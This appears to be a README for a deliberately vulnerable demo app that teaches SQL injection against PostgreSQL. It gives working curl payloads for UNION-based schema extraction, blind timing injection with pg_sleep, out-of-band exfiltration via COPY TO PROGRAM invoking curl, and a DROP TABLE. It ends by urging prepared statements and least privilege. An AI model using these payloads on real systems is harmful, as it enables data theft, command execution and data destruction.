# SQL Injection Demo App

![Bobby Tables...](https://imgs.xkcd.com/comics/exploits_of_a_mom.png)

The application in this repository displays multiple SQL injection
vulnerabilities, that are increasingly more complex to exploit, and
ways to exploit them.

The main point though is not, how those vulnerabilities  can be
exploited, but **that** they **all can be exploited**. So in short:

**Use *prepared statements*! Always!**

## A word about PostgreSQL

The DBMS used in this demo is PostgreSQL. Note that, although we will
exploit SQL injection vulnerabilities in multiple ways in the following
tutorial, all vulnerabilities deliberately exist in the demo application 
or are the consequence of a security misconfiguration.

Nothing of this constitutes a vulnerability in PostgreSQL!

## Setup

1. Build the Demo application:
   ```bash
   mvn clean package -DskipTests
   ``` 
2. Create and start the Docker Compose environment:
   ```bash
   sudo docker compose up -d
   ```
3. Wait a minute.
4. Postgres and RabbitMQ took a little longer to start, so the `app`
   container will have failed to start. Therefore, it's now time for
   ```bash
   sudo docker compose restart app
   ```

## Union style Injection

Let's say our example application provides a REST endpoint we can query via HTTP...

```bash
curl -v http://localhost:8080/cities | jq .
```

We can also filter the result via a `filter` parameter:

```bash
curl -v "http://localhost:8080/cities?filter=a" | jq .
```

This suspiciously feels like an SQL `SELECT a, b, c FROM table WHERE a LIKE filter_param` query.
To exploit this kind of vulnerability, an attacker first needs to find out how many values are
returned in a single result row.

For this we alter our suspected statement with a filter of `Be' ORDER BY 1--`.
This way we order the result rows by the first element of each result row.

```bash
curl -v "http://localhost:8080/cities?filter=Be'%20ORDER%20BY%201--" | jq .
```

After initial success we try to order results by the second result row element.

```bash
curl -v "http://localhost:8080/cities?filter=lin'%20ORDER%20BY%202--"
```

This fails so we know that result rows only contain one element. Given the
results that were returned we can safely assume, that elements are of type string (`VARCHAR`).

## Postgres, tell us your version, please

Now that we have collected enough information to exploit the SQL injection flaw in the
filter implementation, let's use it to find out the database version we are up against.

Given our mental model of the SQL query...
```sql
SELECT a FROM table WHERE a LIKE filter
```

we select what we are interested in with a `UNION SELECT`:
```sql
SELECT a FROM table WHERE a LIKE filter UNION SELECT version()--
```

```bash
curl -v "http://localhost:8080/cities?filter=xyz'%20UNION%20SELECT%20version()--" | jq .
```

## Which tables exist in schema `public`?

But how do attackers navigate a database they have never seen the schema of?
It turns out, that databases will happily tell you about tables, views and other things they contain.
PostgreSQL an MySQL provide this information via an `information_schema`.

To list the names of all tables in a database schema, we can just execute a statement like
```sql
SELECT table_name FROM information_schema.tables WHERE table_schema='public'
```
for schema `public`.

```bash
curl -X GET "http://localhost:8080/cities?filter=xyz'%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema='public'--" | jq .
```


## Blind injection with timing side channel

We have seen how SQL injection vulnerabilities can be exploited, when they exist in
`SELECT` statements. But what about statements, that do not return a result?

Here we have a simple `INSERT` case, just inserting text in a table.

```bash
curl -v -X POST \
 --data "Hello" \
 -H "Content-Type: text/plain" \
 "http://localhost:8080/logger/"
```

## Is there a timing side channel?

There a more ways to return information than just by query results. This is where side channels enter the scene.
The most straight forward kind is a timing side channel, providing information by letting us observe
differences in how long operations take to finish.

Given a statement that does not return anything, we can try to blindly inject SQL and determine whether we
succeeded by using `sleep` functions / statements that databases provide.

```bash
time curl -X POST \
 --data "Bla'); SELECT pg_sleep(10); --" \
 -H "Content-Type: text/plain" \
 "http://localhost:8080/logger/"
```

## Are there tables in schema `public`?

Timing side channels can be used to exfiltrate valuable information for attacker
by making a database _sleep_ conditionally.

```sql
SELECT
    CASE WHEN ( 
        SELECT 
            COUNT(*) 
        FROM
            information_schema.tables 
        WHERE
            table_schema='public' 
    ) > 0
    THEN 
        pg_sleep(10) 
    ELSE
        pg_sleep(0) 
    END
;
```

In the example above, a delay of 10 seconds indicates that there are tables in schema `public`.

Note: We can not use heredocs, as they always end in a newline.
That renders the final comment `--`, used to suppress the end of the
original statement, useless.

```bash
injection=$(printf "%s" "Bla');\n" \
"SELECT\n" \
"    CASE WHEN (\n" \
"        SELECT" \
"            COUNT(*)\n" \
"        FROM\n" \
"            information_schema.tables\n" \
"        WHERE\n" \
"            table_schema='public'\n" \
"    ) > 0\n" \
"    THEN\n" \
"        pg_sleep(10)\n" \
"    ELSE\n" \
"        pg_sleep(0)\n" \
"    END\n" \
"; --")

# Convert \n to actual newlines
injection=$(echo -e $injection)

time curl -X POST \
 \
 -H "Content-Type: text/plain" \
 "http://localhost:8080/logger/" \
 --data "$injection"
```

## Out of band exfiltration

Timing side channels can make SQL injections flaws exploitable, that do not return any result.
But can injections in backend systems be exploited, that process messages potentially long
after they were submitted?

In our last scenario we will see, that exploitation is possible, when the flaw exists in code
that processes messages simply placed in a message queue by an API call. 

As you can see below, the API endpoint places the data to be processed in an AMQP queue (provided by RabbitMQ).

```java
@PostMapping(consumes = {MediaType.APPLICATION_JSON_VALUE})
@ResponseStatus(HttpStatus.CREATED)
public void addMeasurement(@RequestBody final Measurement measurement) {
    LOGGER.info("Adding measurement {}", measurement);

    // omitted for brevity
    
    this.amqpTemplate.send(RmqQueueNames.MEASUREMENT_QUEUE, new Message(serializer.apply(measurement)));
}
```

## Postgres saying hello to our exfiltration HTTP server

The demo application is connected to the database as database root user. In Postgres this
allows us to execute `COPY ... TO PROGRAM ...` statements and run any application installed on
the database server, that the Postgres user can execute.

For our demo, `curl` is installed in the Docker image running Postgres. Combined, that allows us
to make outgoing HTTP requests from the database. The connection we used to enqueue our exploit
data is long closed and the database runs `curl`, opening a completely unrelated network connection.
We are therefore exfiltrating data _out of band_.

```bash
curl -X POST \
 -H "Content-Type: application/json" \
 "http://localhost:8080/api/measurements" \
 --data-binary @- <<SomeJSON
{
  "timestamp": "2022-11-29T15:16:25.911418656Z",
  "city": "Berlin'; COPY (SELECT '') TO PROGRAM 'curl -X GET http://app:8080/monitoring/hello_from_postgres' --",
  "temperature": 9.123
}
SomeJSON
```

## Exfiltrate something useful via HTTP

To show, that we can not just invoke curl but also use this way to exfiltrate useful data for attacks,
let's have the database provide us with the names of all tables in schema `public`:

```bash
curl -X POST \
 -H "Content-Type: application/json" \
 "http://localhost:8080/api/measurements" \
 --data-binary @- <<SomeJSON
{
  "timestamp": "2022-11-29T15:16:25.911418656Z",
  "city": "Berlin'; COPY (SELECT table_name FROM information_schema.tables) TO PROGRAM 'curl -X POST -H \"Content-Type: text/plain\" --data-binary @- http://app:8080/monitoring/' --",
  "temperature": 9.123
}
SomeJSON
```


## The end

Time to finish this in Bobby Tables style... well, kind of ;-)

```bash
curl -X POST \
 \
 -H "Content-Type: text/plain" \
 "http://localhost:8080/logger/" \
 --data "Bobby'); DROP TABLE logs; --"
```

## Lessons learned

- Always use prepared statements when interacting with a database.
- Make sure your database is properly configured for least privilege.
- If something _might_ be exploitable, it almost always is.
